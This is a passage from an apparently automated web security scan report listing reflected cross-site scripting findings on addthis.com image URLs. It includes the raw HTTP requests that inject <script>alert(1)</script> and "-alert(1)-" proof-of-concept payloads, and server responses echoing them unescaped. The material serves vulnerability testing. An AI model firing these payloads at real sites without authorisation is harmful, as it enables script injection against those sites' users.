Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ebl33hb13tq6thnm8c9v344jn7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorerc33dd<script>alert(1)</script>b0dbb3e2827/borderBottomRight.png</strong>
...[SNIP]...

2.83. http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomRight.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17e79"-alert(1)-"60a8f816475 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderBottomRight.png17e79"-alert(1)-"60a8f816475 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=q04772ld7gfd0b9bn0pc6psmm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderBottomRight.png17e79"-alert(1)-"60a8f816475";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.84. http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomRight.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52f52<script>alert(1)</script>32320915712 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderBottomRight.png52f52<script>alert(1)</script>32320915712 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r6osb4mhv0rt1jp5b4aeekhc22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderBottomRight.png52f52<script>alert(1)</script>32320915712</strong>
...[SNIP]...

2.85. http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomRight.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59b66<script>alert(1)</script>1938fd87cdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderBottomRight.png?59b66<script>alert(1)</script>1938fd87cdb=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=dinq16mgcssb886im9s3hnfvs1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderBottomRight.png?59b66<script>alert(1)</script>1938fd87cdb=1</strong>
...[SNIP]...

2.86. http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleLeft.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cd9e<script>alert(1)</script>505a8ae9dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images45cd9e<script>alert(1)</script>505a8ae9dc/internet_explorer/borderMiddleLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=a9kqs3hplkm8d4sd8b4o0o8h44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images45cd9e<script>alert(1)</script>505a8ae9dc/internet_explorer/borderMiddleLeft.png</strong>
...[SNIP]...

2.87. http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleLeft.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a5a2"-alert(1)-"f3848026585 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images49a5a2"-alert(1)-"f3848026585/internet_explorer/borderMiddleLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=mdt43sgg41msph8e24nn6b1n10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images49a5a2"-alert(1)-"f3848026585/internet_explorer/borderMiddleLeft.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomV
...[SNIP]...

2.88. http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleLeft.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d445"-alert(1)-"37db386d8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer1d445"-alert(1)-"37db386d8a/borderMiddleLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=k7cs4svtuor3b1bq89k5nld4q0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer1d445"-alert(1)-"37db386d8a/borderMiddleLeft.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","Fals
...[SNIP]...

2.89. http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleLeft.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b8c4<script>alert(1)</script>46ff67029b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer9b8c4<script>alert(1)</script>46ff67029b7/borderMiddleLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=daeh10r7167npdo6pu2ie56uj3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer9b8c4<script>alert(1)</script>46ff67029b7/borderMiddleLeft.png</strong>
...[SNIP]...

2.90. http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleLeft.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17485<script>alert(1)</script>5f6b538c2b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderMiddleLeft.png17485<script>alert(1)</script>5f6b538c2b0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=ghchku0t459tv0fihldh73pda7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderMiddleLeft.png17485<script>alert(1)</script>5f6b538c2b0</strong>
...[SNIP]...

2.91. http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleLeft.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c3b1"-alert(1)-"d850d25e0bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderMiddleLeft.png3c3b1"-alert(1)-"d850d25e0bb HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=aa1k2ch44jii4ilkh4ievept02; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderMiddleLeft.png3c3b1"-alert(1)-"d850d25e0bb";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.92. http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleLeft.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f5a88<script>alert(1)</script>5d905fe2d98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderMiddleLeft.png?f5a88<script>alert(1)</script>5d905fe2d98=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=2sfuuefs4juaslmjl0iuc1p6j1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderMiddleLeft.png?f5a88<script>alert(1)</script>5d905fe2d98=1</strong>
...[SNIP]...

2.93. http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleRight.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c998<script>alert(1)</script>a709946284 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images46c998<script>alert(1)</script>a709946284/internet_explorer/borderMiddleRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=0k2mt39l8tu507dlsdg9sm7gl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images46c998<script>alert(1)</script>a709946284/internet_explorer/borderMiddleRight.png</strong>
...[SNIP]...

2.94. http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleRight.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 680ce"-alert(1)-"0bda12d275f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4680ce"-alert(1)-"0bda12d275f/internet_explorer/borderMiddleRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=msmg3deh4eodaapp6h19o5pec7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4680ce"-alert(1)-"0bda12d275f/internet_explorer/borderMiddleRight.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustom
...[SNIP]...

2.95. http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleRight.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7608a"-alert(1)-"42361126fe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer7608a"-alert(1)-"42361126fe8/borderMiddleRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=o7moor72doc5m092iviho6f557; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer7608a"-alert(1)-"42361126fe8/borderMiddleRight.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","Fal
...[SNIP]...

2.96. http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleRight.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5afa<script>alert(1)</script>246b05710e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorerc5afa<script>alert(1)</script>246b05710e8/borderMiddleRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3m8mdeladqgt1lee6onn1nltd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorerc5afa<script>alert(1)</script>246b05710e8/borderMiddleRight.png</strong>
...[SNIP]...

2.97. http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleRight.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 425bf<script>alert(1)</script>6ccdab0aff5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

